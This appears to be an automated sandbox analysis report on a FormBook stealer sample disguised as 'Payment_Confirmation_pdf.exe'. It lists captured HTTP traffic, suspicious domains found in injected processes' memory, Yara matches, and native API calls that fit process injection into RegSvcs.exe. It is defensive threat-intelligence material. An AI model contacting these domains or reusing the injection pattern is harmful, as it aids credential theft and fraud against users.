<style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
Source: sdiagnhost.exe, 00000013.00000002.2566048825.00000000057DC000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003EEC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://batit.aliyun.com/alww.html?id=00000000004252206681
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1426301513.0000000003155000.00000004.00000800.00020000.00000000.sdmp, cQwRvD.exe, 0000000B.00000002.1591356041.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://tempuri.org/_prof_basesDataSet.xsd
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://tempuri.org/_prof_basesDataSet1.xsdEcom.vimeo.api.Properties.Resources
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://vimeo.com/api/v2/
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://vimeo.com/api/v2/activity/
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://vimeo.com/api/v2/album/
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://vimeo.com/api/v2/channel/=http://vimeo.com/api/v2/group/
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: http://vimeo.com/api/v2/video/
Source: mYtMtAAMpAtCOL.exe, 00000014.00000002.2567539017.000000000594C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.innovateideas.xyz
Source: mYtMtAAMpAtCOL.exe, 00000014.00000002.2567539017.000000000594C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.innovateideas.xyz/4wqa/
Source: firefox.exe, 00000016.00000002.1959082934.0000000027734000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD
Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000944000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033W
Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdiagnhost.exe, 00000013.00000003.1843182135.0000000007744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lolipop.jp/
Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://pepabo.com/
Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.minne.com/files/banner/minne_600x500
Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Payment_Confirmation_pdf.exe
Source: initial sample	Static PE information: Filename: Payment_Confirmation_pdf.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0042C983 NtClose,	10_2_0042C983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462B60 NtClose,LdrInitializeThunk,	10_2_01462B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_01462DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_01462C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014635C0 NtCreateMutant,LdrInitializeThunk,	10_2_014635C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01464340 NtSetContextThread,	10_2_01464340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01464650 NtSuspendThread,	10_2_01464650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462BE0 NtQueryValueKey,	10_2_01462BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462BF0 NtAllocateVirtualMemory,	10_2_01462BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462B80 NtQueryInformationFile,	10_2_01462B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462BA0 NtEnumerateValueKey,	10_2_01462BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462AD0 NtReadFile,	10_2_01462AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462AF0 NtWriteFile,	10_2_01462AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462AB0 NtWaitForSingleObject,	10_2_01462AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462D00 NtSetInformationFile,	10_2_01462D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462D10 NtMapViewOfSection,	10_2_01462D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462D30 NtUnmapViewOfSection,	10_2_01462D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462DD0 NtDelayExecution,	10_2_01462DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462DB0 NtEnumerateKey,	10_2_01462DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462C60 NtCreateKey,	10_2_01462C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462C00 NtQueryInformationProcess,	10_2_01462C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462CC0 NtQueryVirtualMemory,	10_2_01462CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462CF0 NtOpenProcess,	10_2_01462CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462CA0 NtQueryInformationToken,	10_2_01462CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462F60 NtCreateProcessEx,	10_2_01462F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462F30 NtCreateSection,	10_2_01462F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462FE0 NtCreateFile,	10_2_01462FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462F90 NtProtectVirtualMemory,	10_2_01462F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462FA0 NtQuerySection,	10_2_01462FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462FB0 NtResumeThread,	10_2_01462FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462E30 NtWriteVirtualMemory,	10_2_01462E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462EE0 NtQueueApcThread,	10_2_01462EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462E80 NtReadVirtualMemory,	10_2_01462E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01462EA0 NtAdjustPrivilegesToken,	10_2_01462EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01463010 NtOpenDirectoryObject,	10_2_01463010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01463090 NtSetValueKey,	10_2_01463090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014639B0 NtGetContextThread,	10_2_014639B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01463D70 NtOpenThread,	10_2_01463D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01463D10 NtOpenProcessToken,	10_2_01463D10

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Code function: 0_2_013BD63C	0_2_013BD63C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004018AF	10_2_004018AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00418933	10_2_00418933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00401190	10_2_00401190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004101B3	10_2_004101B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00416B2E	10_2_00416B2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00416B33	10_2_00416B33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004103D3	10_2_004103D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004023EA	10_2_004023EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004023F0	10_2_004023F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040E3B3	10_2_0040E3B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040E503	10_2_0040E503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004026EF	10_2_004026EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004026F0	10_2_004026F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00402F70	10_2_00402F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0042EF33	10_2_0042EF33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B8158	10_2_014B8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420100	10_2_01420100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CA118	10_2_014CA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E81CC	10_2_014E81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F01AA	10_2_014F01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EA352	10_2_014EA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F03E6	10_2_014F03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E3F0	10_2_0143E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B02C0	10_2_014B02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430535	10_2_01430535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F0591	10_2_014F0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E2446	10_2_014E2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014DE4F6	10_2_014DE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01454750	10_2_01454750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430770	10_2_01430770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142C7C0	10_2_0142C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144C6E0	10_2_0144C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01446962	10_2_01446962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014329A0	10_2_014329A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014FA9A6	10_2_014FA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143A840	10_2_0143A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01432840	10_2_01432840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E8F0	10_2_0145E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014168B8	10_2_014168B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EAB40	10_2_014EAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E6BD7	10_2_014E6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142EA80	10_2_0142EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143AD00	10_2_0143AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CCD1F	10_2_014CCD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142ADE0	10_2_0142ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01448DBF	10_2_01448DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430C00	10_2_01430C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01420CF2	10_2_01420CF2
